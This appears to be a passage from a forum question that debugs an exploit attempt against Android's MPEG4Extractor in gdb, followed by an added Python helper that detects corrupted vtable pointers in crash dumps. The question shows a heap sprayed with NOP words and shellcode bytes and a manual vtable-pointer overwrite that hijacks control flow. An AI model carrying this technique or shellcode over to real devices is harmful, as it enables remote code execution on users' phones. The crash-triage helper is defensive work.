   0xb66e100c <+20>:    add r8, pc
   0xb66e100e <+22>:    add r7, sp, #120    ; 0x78
   0xb66e1010 <+24>:    str r2, [sp, #52]   ; 0x34
   0xb66e1012 <+26>:    ldr.w   r5, [r8, r3]
   0xb66e1016 <+30>:    ldrd    r2, r3, [r1]
   0xb66e101a <+34>:    ldr r4, [sp, #52]   ; 0x34
   0xb66e101c <+36>:    ldr r1, [pc, #688]  ; (0xb66e12d0 <_ZN7android14MPEG4Extractor10parseChunkEPxi+728>)
   0xb66e101e <+38>:    ldr r0, [r5, #0]
   0xb66e1020 <+40>:    strd    r2, r3, [sp]
   0xb66e1024 <+44>:    ldr r2, [pc, #684]  ; (0xb66e12d4 <_ZN7android14MPEG4Extractor10parseChunkEPxi+732>)
   0xb66e1026 <+46>:    str r4, [sp, #8]
   0xb66e1028 <+48>:    add r1, pc
   0xb66e102a <+50>:    str r0, [sp, #436]  ; 0x1b4
   0xb66e102c <+52>:    movs    r0, #2
   0xb66e102e <+54>:    add r2, pc
   0xb66e1030 <+56>:    blx 0xb66bc038 <__android_log_print@plt>
   0xb66e1034 <+60>:    ldr r0, [r6, #80]   ; 0x50
   0xb66e1036 <+62>:    movs    r3, #8
   0xb66e1038 <+64>:    ldr r1, [r0, #0]
   0xb66e103a <+66>:    str r7, [sp, #0]
   0xb66e103c <+68>:    str r3, [sp, #4]
   0xb66e103e <+70>:    ldrd    r2, r3, [r9]
=> 0xb66e1042 <+74>:    ldr r4, [r1, #28]
   0xb66e1044 <+76>:    blx r4

Why does it segfault, btw?

Update 3:

I think I've figured it out: the vtable pointer must itself be overwritten with a pointer!

heap with NOPs and shellcode:

0xb3000230: 0xbf00bf00  0xbf00bf00  0xbf00bf00  0xbf00bf00
0xb3000240: 0xbf00bf00  0xbf00bf00  0xbf00bf00  0xbf00bf00
0xb3000250: 0xbf00bf00  0xbf00bf00  0xbf00bf00  0xbf00bf00
0xb3000260: 0xbf00bf00  0xbf00bf00  0xbf00bf00  0xbf00bf00
0xb3000270: 0xe28f3001  0xe12fff13  0x1c221b24  0x31ff21ff
0xb3000280: 0x31ff31ff  0x46783105  0x2705302a  0x2214df01
0xb3000290: 0x310c4679  0xdf012704  0x1c201b24  0xdf012701

Here set the vtable pointer to 0xb3000240

(gdb) set *((int *) 0xb8898ab8) = 0xb3000240
(gdb) x/10x 0xb8898ab8
0xb8898ab8: 0xb3000240  0xb8898ae8  0xb8898b00  0x00000000
0xb8898ac8: 0xb8891818  0x002e0064  0x0000001c  0x00000000
0xb8898ad8: 0x0100024c  0xb1fa3008
(gdb) delete breakpoints 
Delete all breakpoints? (y or n) y
(gdb) cont
Continuing.
[New LWP 6016]

Thread 11 "Binder_1" received signal SIGSEGV, Segmentation fault.
0xbf00bf00 in ?? ()
(gdb) i r
r0             0xb8898ab8   3096021688
r1             0xb3000240   3003122240
r2             0x1000305    16777989
r3             0x0  0
r4             0xbf00bf00   3204497152
r5             0xb6ebfde4   3068919268
r6             0xb8898b38   3096021816
r7             0xb513d700   3037976320
r8             0xb673e7d0   3061049296
r9             0xb513da68   3037977192
r10            0x1c 28
r11            0xffffffff   4294967295
r12            0xb513d1c8   3037974984
sp             0xb513d688   0xb513d688
lr             0xb6684047   -1234681785
pc             0xbf00bf00   0xbf00bf00
cpsr           0x200f0010   537853968
(gdb) 
posted by android_dev 29.03.2017 - 15:10

0 answers
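A small analysis helper, added here as an example and not part of the question or of Android's own code: it parses pasted gdb `x/Nx` rows (skipping `(gdb)` prompts and pager lines) and follows the same three loads the parseChunk disassembly in Update 2 performs (field at this+0x50 → object pointer → vtable pointer → slot at offset 28), then checks that the vtable pointer and the slot target both lie inside a known module's mapped range. That is the check a crash triager runs to tell a corrupted object header, like the one behind the SIGSEGV at 0xbf00bf00 above, from a legitimate virtual call. The dump, the addresses and the module range below are constructed for the example; only the slot offset 28 comes from the question's disassembly.

```python
import re
from typing import Dict, List, Optional, Tuple

# One gdb "x/Nx" row: "0xADDR: 0xWORD 0xWORD ..." (32-bit words, as in the question)
DUMP_ROW = re.compile(r"^0x([0-9a-fA-F]+):((?:\s+0x[0-9a-fA-F]{8})+)\s*$")

# Slot offset taken from the question's disassembly: "ldr r4, [r1, #28]; blx r4"
READAT_SLOT_OFFSET = 28

# Constructed dump (not from the page): an extractor whose field at 0x1050 points
# at a healthy object (0x2000), and a second field at 0x1150 pointing at an object
# whose header was overwritten with 0x41414141.
SAMPLE_DUMP = """\
(gdb) x/4x 0x1050
0x1050: 0x00002000  0x00000000  0x00000000  0x00000000
(gdb) x/4x 0x1150
0x1150: 0x00002100  0x00000000  0x00000000  0x00000000
(gdb) x/4x 0x2000
0x2000: 0x00003000  0xffffffed  0x00000000  0x00000000
(gdb) x/4x 0x2100
0x2100: 0x41414141  0x41414141  0x41414141  0x41414141
---Type <return> to continue, or q <return> to quit---
(gdb) x/8x 0x3000
0x3000: 0x00004001  0x00004081  0x00004101  0x00004181
0x3010: 0x00004201  0x00004281  0x00004301  0x00004381
"""

# Constructed module map: (start, end, name). The vtable and the Thumb function
# entry points are expected to live inside the library that defines the class.
MODULES: List[Tuple[int, int, str]] = [(0x3000, 0x5000, "libexample.so (constructed)")]


def parse_dump(text: str) -> Dict[int, int]:
    """Map address -> 32-bit word for every row of a gdb x/Nx dump.
    Prompt lines and pager lines do not match DUMP_ROW and are ignored."""
    mem: Dict[int, int] = {}
    for line in text.splitlines():
        m = DUMP_ROW.match(line.strip())
        if m is None:
            continue
        base = int(m.group(1), 16)
        for i, tok in enumerate(m.group(2).split()):
            mem[base + 4 * i] = int(tok, 16)
    return mem


def resolve_virtual_call(mem: Dict[int, int], field_addr: int,
                         slot_offset: int) -> Tuple[Optional[int], Optional[int], Optional[int]]:
    """Follow field -> object -> vtable -> slot, mirroring
    ldr r0,[r6,#80]; ldr r1,[r0,#0]; ldr r4,[r1,#28]. A hop whose address is
    absent from the dump yields None for it and every later hop."""
    obj = mem.get(field_addr)
    vptr = mem.get(obj) if obj is not None else None
    func = mem.get(vptr + slot_offset) if vptr is not None else None
    return obj, vptr, func


def in_known_module(addr: int, modules: List[Tuple[int, int, str]]) -> bool:
    return any(lo <= addr < hi for lo, hi, _name in modules)


def classify(mem: Dict[int, int], field_addr: int, slot_offset: int,
             modules: List[Tuple[int, int, str]]) -> str:
    """Return 'ok' when the whole chain stays inside known modules, otherwise a
    short description of the first hop that breaks the vtable invariant."""
    obj, vptr, func = resolve_virtual_call(mem, field_addr, slot_offset)
    if obj is None or vptr is None:
        return "object or its first word is not in the dump"
    if not in_known_module(vptr, modules):
        return "vtable pointer outside every known module (corrupted object header)"
    if func is None:
        return "vtable slot not in the dump"
    if not in_known_module(func, modules):
        return "slot target outside every known module"
    return "ok"


if __name__ == "__main__":
    mem = parse_dump(SAMPLE_DUMP)
    for field in (0x1050, 0x1150):
        chain = resolve_virtual_call(mem, field, READAT_SLOT_OFFSET)
        print(hex(field), [hex(x) if x is not None else None for x in chain],
              classify(mem, field, READAT_SLOT_OFFSET, MODULES))
```

The module ranges would normally be filled from `info sharedlibrary` or `/proc/<pid>/maps` of the crashed process; the helper deliberately treats a vtable pointer that lands on the heap or in a fill pattern as the finding, which is exactly the condition vtable-verification and CFI schemes in the compiler reject at runtime.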